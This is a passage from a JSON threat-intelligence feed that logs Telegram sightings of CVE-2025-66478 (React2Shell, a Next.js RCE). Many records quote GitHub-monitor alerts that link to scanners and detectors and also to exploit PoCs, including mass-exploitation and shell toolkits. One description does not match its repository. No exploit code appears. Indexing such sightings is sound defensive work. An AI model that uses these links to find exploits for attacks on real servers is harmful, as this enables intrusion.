"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/ssQ5arzlSwTGFzo4M-wfjB4G7lNHt9rPKo_5YI_2_l0sfck", "content": "", "creation_timestamp": "2025-12-08T21:00:05.000000Z"}, {"uuid": "273c105c-2c95-4b77-9502-689b9cc3ed9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61870", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aLightweight scanner and Nuclei templates for identifying React and Next.js deserialization RCEs (CVE-2025-55182 / CVE-2025-66478).\nURL\uff1ahttps://github.com/grp-ops/react2shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T04:06:33.000000Z"}, {"uuid": "aafa9c15-9d23-4a89-9e0a-3d79448c3a93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/IjoB3mlLTS_3iIHb7Sh1-us4dDaMJPcARLXj8vp-lkIGEt0", "content": "", "creation_timestamp": "2025-12-16T21:00:04.000000Z"}, {"uuid": "68d9373b-b083-4dd5-804a-83884941794f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/vGftsyUiEMeyjPcl2UtvJfMNUjwCrmwOhiCYLQD2SH3tqAc", "content": "", "creation_timestamp": "2025-12-10T15:00:07.000000Z"}, {"uuid": "45415716-1c5b-438b-972d-e932032b86b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "Telegram/w9zN8kEWGrj3qsEmiR0Uos76ZxyKnO6RlLbWXw3M07fNo7k", "content": "", "creation_timestamp": "2025-12-06T03:00:05.000000Z"}, {"uuid": "7ea53597-d868-4e24-b393-f6ce37fe0205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61641", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aReact2Shell Scanner (CVE-2025-55182 & CVE-2025-66478)\nURL\uff1ahttps://github.com/CymulateResearch/React2Shell-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T13:55:53.000000Z"}, {"uuid": "15e42ca4-65b9-4cea-8bd3-1263673a44a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/HmU5z33cuHG2mX7FyWUOrrqLxPcpZ2hARPr8TDn9QyB7v9o", "content": "", "creation_timestamp": "2025-12-08T09:00:04.000000Z"}, {"uuid": "4db2924e-6877-4e07-a1bd-2ff092ade990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/PvVlKU5mouDrQkucYBVA45d4PI3zxJLZNVLfukuzHyAN8nc", "content": "", "creation_timestamp": "2025-12-05T03:00:07.000000Z"}, {"uuid": "3a01840a-c0a5-4fab-bcbe-83208b720c05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "Telegram/WtJrROt8lM6WHR-fB1g4_YMxbxFBlPxavIyCnf0PfRbxbYQ", "content": "", "creation_timestamp": "2025-12-05T15:00:08.000000Z"}, {"uuid": "4c9e3942-2329-47c3-80dc-9ad4dd667dd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/cQf2CT3r4WvnJhAn_Z5tbBdbHlIor2zaa0XkqChp6pgA9CQ", "content": "", "creation_timestamp": "2025-12-13T09:00:04.000000Z"}, {"uuid": "6ba871d8-786b-4627-a367-e0089519bf8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "Telegram/iz-sEuDMPlTBB-fphukJfYHL-DWXQ2e7rcEETfrcZTyAr29MbQ", "content": "", "creation_timestamp": "2025-12-23T17:34:03.000000Z"}, {"uuid": "6a02da6a-9ee7-4921-99ed-87e0a004404f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62397", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-55182 and CVE-2025-66478\nURL\uff1ahttps://github.com/FurkanKAYAPINAR/ReactNext2Shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-10T11:39:05.000000Z"}, {"uuid": "3a45f975-9b22-470e-87bc-03e82d395108", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61965", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aMass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/hlsitechio/cve-2025-55182-tools\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T23:35:34.000000Z"}, {"uuid": "a7cc252c-5f48-4385-bf03-08be4b855d6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://t.me/GithubRedTeam/61841", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aReact2Shell Ultimate - The most comprehensive CVE-2025-66478 Scanner for Next.js RSC RCE vulnerability. Multi-mode detection, WAF bypass, local scanning.\nURL\uff1ahttps://github.com/kOaDT/poc-cve-2025-55182\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-05T22:45:18.000000Z"}, {"uuid": "a8e50b23-9e5f-4ede-aad7-ad465d9e4db4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62325", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA critical vulnerability in React Server Components affecting React 19 (CVE-2025-55182) and frameworks that use it like Next.js (CVE-2025-66478). \nURL\uff1ahttps://github.com/trax69/cve-2025-55182-poc\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T23:32:46.000000Z"}, {"uuid": "beed4e95-88bc-421f-831c-f9ad74cf2b8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62323", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA critical vulnerability in React Server Components affecting React 19 (CVE-2025-55182) and frameworks that use it like Next.js (CVE-2025-66478). \nURL\uff1ahttps://github.com/dr4xp/react2shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T23:12:13.000000Z"}, {"uuid": "d6d0a820-4015-48f3-9e0b-469116524390", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62309", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aReact2Shell is a Python-based proof-of-concept tool designed to exploit CVE-2025-55182 and CVE-2025-66478, both impacting Next.js applications using React Server Components (RSC).\nURL\uff1ahttps://github.com/shyambhanushali/React2Shell---CVE-2025-55182-CVE-2025-66478\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T17:12:17.000000Z"}, {"uuid": "26631239-73bd-4205-b12e-98b8851d0eb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62313", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aReact2Shell is a Python-based proof-of-concept tool designed to exploit CVE-2025-55182 and CVE-2025-66478, both impacting Next.js applications using React Server Components (RSC).\nURL\uff1ahttps://github.com/shyambhanushali/React2Shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T18:59:19.000000Z"}, {"uuid": "c12da1fa-62d4-45d4-a81d-13d6bfff45c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62303", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aTest case for CVE-2025-66478\nURL\uff1ahttps://github.com/react2shell-repo-menagerie/CVE-2025-66478-single-nextjs-yarn\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T14:47:49.000000Z"}, {"uuid": "34bd602c-6d80-4a00-8d47-ced182e6c12f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62204", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aTesting environment for trying CVE-2025-66478 \nURL\uff1ahttps://github.com/adrianhazgarcia/React4Shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-08T16:42:03.000000Z"}, {"uuid": "e79a81eb-3fdd-4fbb-a3da-318806b024f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62180", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-55182 and CVE-2025-66478\nURL\uff1ahttps://github.com/FurkanKAYAPINAR/React-Next-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-08T14:36:31.000000Z"}, {"uuid": "4fd5091e-3e5b-4a3b-8dfb-023faecc37c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61524", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aScript to quick check CVE-2025-55182 (React) and CVE-2025-66478 (Next.js)  - Critical unauthenticated RCE vulnerabilities in the React Server Components (RSC) \u201cFlight\u201d protocol.\nURL\uff1ahttps://github.com/BankkRoll/Quickcheck-CVE-2025-55182-React-and-CVE-2025-66478-Next.js\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-03T18:18:10.000000Z"}, {"uuid": "e96286a4-870b-4584-8706-51f3b58110f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61906", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aFast scanner for detecting and confirming Next.js RCE vulnerabilities (CVE-2025-55182 & CVE-2025-66478).\nURL\uff1ahttps://github.com/cypholab/evilact\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T11:36:41.000000Z"}, {"uuid": "b56618d9-ce72-4505-b1bb-c204fbaaec81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/cKure/15793", "content": "\ud83d\udcf1 React2Shell Ultimate - CVE-2025-66478 Scanner.\n\nhttps://github.com/hackersatyamrastogi/react2shell-ultimate", "creation_timestamp": "2025-12-06T09:45:52.000000Z"}, {"uuid": "f6508f0d-2322-4ab7-8101-b810eb83b28b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61838", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aReact2Shell Ultimate - The most comprehensive CVE-2025-66478 Scanner for Next.js RSC RCE vulnerability. Multi-mode detection, WAF bypass, local scanning.\nURL\uff1ahttps://github.com/hackersatyamrastogi/react2shell-ultimate\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-05T22:22:12.000000Z"}, {"uuid": "acb0b5e0-bb87-4ea6-b557-d6f1b4ebddab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61669", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aNuclei template for detecting react2shell  (CVE-2025-55182 & CVE-2025-66478)\nURL\uff1ahttps://github.com/shamo0/react2shell-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T16:43:26.000000Z"}, {"uuid": "4cfcd21c-55ef-4f56-bcb5-e61550fb628b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61542", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-55182 \u6f0f\u6d1e\u5229\u7528GUI,PoC / Exploit for CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/pyroxenites/CVE-2025-55182\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T01:37:25.000000Z"}, {"uuid": "b16650e0-ec03-4b6c-a532-e0878d77f6a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61545", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aFor CVE-2025-55182 and CVE-2025-66478 Security Response\nURL\uff1ahttps://github.com/heiheishushu/rsc_detect_CVE-2025-55182\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T02:02:55.000000Z"}, {"uuid": "b0129669-67cd-4164-a301-6cbf7831ffcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/OHr82OtRsE7SrX-5JX0BTKOCwGseELWPcAGkyhObfyZN6dU", "content": "", "creation_timestamp": "2025-12-14T15:00:08.000000Z"}, {"uuid": "dd84db50-6bcc-48ed-8fc1-0f364f8e0aa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "Telegram/iRuzp0CuSyW9LBw5wJCbHvBDGRyj3e1op05yhSdYb6lHYSQ", "content": "", "creation_timestamp": "2025-12-19T03:00:07.000000Z"}, {"uuid": "e0b6712e-6286-451b-96a6-81abec5984ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/d1qJqLxVXfmX2tDEguuny-SmZQucZglbuvctPOWUAOgRGig", "content": "", "creation_timestamp": "2025-12-04T09:00:05.000000Z"}, {"uuid": "00addcb7-00ad-401d-a599-33f4f20a23be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62270", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aTest case for CVE-2025-66478\nURL\uff1ahttps://github.com/react2shell-repo-menagerie/CVE-2025-66478-monorepo-nextjs-npm-workspaces\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T08:50:18.000000Z"}, {"uuid": "9c837954-70bf-4265-b01c-e68204fca4ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62259", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a[beta] Detection of the React Server Actions Exploit vector \u2013 CVE-2025-55182 / CVE-2025-66478\nURL\uff1ahttps://github.com/MoisesTapia/http-react2shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T05:06:13.000000Z"}, {"uuid": "0ffc2540-1c0f-4bca-a6e3-9c9aae9ef99f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62258", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aTest case for CVE-2025-66478\nURL\uff1ahttps://github.com/react2shell-repo-menagerie/CVE-2025-66478-single-nextjs-npm\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T04:53:34.000000Z"}, {"uuid": "d9fc7ab4-4dd2-4d97-bcd8-03039700d00b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62216", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCommand-line post-exploitation toolkit for Microsoft SQL Server \u2014 enabling RCE, privilege escalation, persistence, and defense evasion via T-SQL.\nURL\uff1ahttps://github.com/Security-Phoenix-demo/react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-08T20:43:27.000000Z"}, {"uuid": "0cd0fadd-45b6-4df0-af7c-0928513a11bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://t.me/GithubRedTeam/61799", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aPoC: CVE-2025-55182 (React) and CVE-2025-66478 (Next.js)\nURL\uff1ahttps://github.com/nehkark/CVE-2025-55182\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-05T14:59:20.000000Z"}, {"uuid": "3b4fbfcf-2b99-407f-bdfa-ddc0927df0d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/realcodeb0ss/201", "content": "", "creation_timestamp": "2025-12-05T01:21:39.000000Z"}, {"uuid": "b13586ee-3de7-4319-88f5-22dfcfe82a85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62221", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aScanner to detect the presence of CVE-2025-55182 & CVE-2025-66478 on targeted web services.\nURL\uff1ahttps://github.com/Shield-Cyber/react2shell-scanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-08T22:06:14.000000Z"}, {"uuid": "06d17ab6-6184-43b7-bae3-c57d2be6556a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62210", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA Chrome extension for detecting React2Shell vulnerabilities (CVE-2025-55182 & CVE-2025-66478) in web applications\nURL\uff1ahttps://github.com/xiaopeng-ye/react2shell-detector\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-08T18:29:45.000000Z"}, {"uuid": "b1d14953-6e40-429c-a56e-54ccb1bf4e93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61948", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aMass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/AdityaBhatt3010/React2Shell-CVE-2025-55182-The-Deserialization-Bug-That-Broke-the-Web\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T18:20:47.000000Z"}, {"uuid": "33016ff5-bfa8-4767-91c6-89a2a35a9b76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62071", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\ud83d\udd25 React2Shell Toolkit - CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-07T15:36:05.000000Z"}, {"uuid": "70e3998c-5f64-4cff-ac5b-1efe345ef05c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62070", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\ud83d\udd25 React2Shell Toolkit - CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/cybertechajju/R2C-CVE-2025-55182-66478\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-07T15:21:00.000000Z"}, {"uuid": "7573f649-4fe8-4689-89bd-c5e7460227f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61785", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aAn analysis of CVE-2025-55182 and CVE-2025-66478 -- the vulnerabilities behind React2Shell. Tools, technical information, etc\nURL\uff1ahttps://github.com/freeqaz/react2shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-05T12:01:16.000000Z"}, {"uuid": "7e4029b7-55d7-4fcb-ad74-bb2b1f64a434", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61681", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aBurp Suite extension to detect the Next.js / React Server Components (RSC) Remote Code Execution vulnerability (CVE-2025-55182 & CVE-2025-66478).\nURL\uff1ahttps://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T19:52:25.000000Z"}, {"uuid": "d7d278d4-17bb-4a39-8885-d74c04bb5cb7", 